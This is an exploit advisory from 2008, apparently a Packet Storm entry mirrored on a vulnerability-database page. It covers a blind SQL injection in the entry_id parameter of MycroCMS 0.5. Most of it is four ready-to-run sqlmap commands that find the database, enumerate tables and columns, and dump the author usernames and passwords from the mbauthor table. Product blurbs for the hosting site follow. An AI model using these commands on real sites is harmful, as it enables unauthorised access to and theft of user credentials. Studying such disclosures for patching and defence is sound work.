Lucene search
K

mycrocms-sql.txt

🗓️ 12 Jun 2008 00:00:00Reported by CWH UndergroundType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

MycroCMS 0.5 Remote Blind SQL Injection Vulnerability, vulnerable path, exploitation using SqlMa

Code
`=======================================================  
MycroCMS 0.5 Remote Blind SQL Injection Vulnerability   
=======================================================  
  
,--^----------,--------,-----,-------^--,  
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..  
`+---------------------------^----------|  
`\_,-------, _________________________|  
/ XXXXXX /`| /  
/ XXXXXX / `\ /  
/ XXXXXX /\______(  
/ XXXXXX /   
/ XXXXXX /  
(________(   
`------'  
  
AUTHOR : CWH Underground  
DATE : 11 June 2008  
SITE : www.citec.us  
  
  
#####################################################  
APPLICATION : MycroCMS  
VERSION : 0.5 (Lastest Version)  
DOWNLOAD : http://downloads.sourceforge.net/mycrocms  
#####################################################  
  
---Remote Blind SQL Injection---  
  
***magic_quotes_gpc = off***  
  
-----------------  
Vulnerable Path  
-----------------  
  
[+] http://[Target]/[mycrocms_path]/mycrocms/?entry_id=[Blind SQL]  
  
  
---------------------------------  
Blind SQL Injection with SqlMap  
---------------------------------  
  
[+] Find DB name  
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" --current-db -u http://localhost/mycrocms/?entry_id=3  
  
[+] Enumerate All Tables (Use Database "mycrocms")  
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" --tables -u http://localhost/mycrocms/?entry_id=3  
  
[+] Enumerate All Columns in Table (Use Table "mbauthor")  
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" --columns -u http://localhost/mycrocms/?entry_id=3  
  
[+] Dump All Data in Column (Use Column "author_name" and "author_pw")  
POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" -C author_name,author_pw --dump -u http://localhost/mycrocms/?entry_id=3  
  
  
##################################################################  
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #  
##################################################################  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation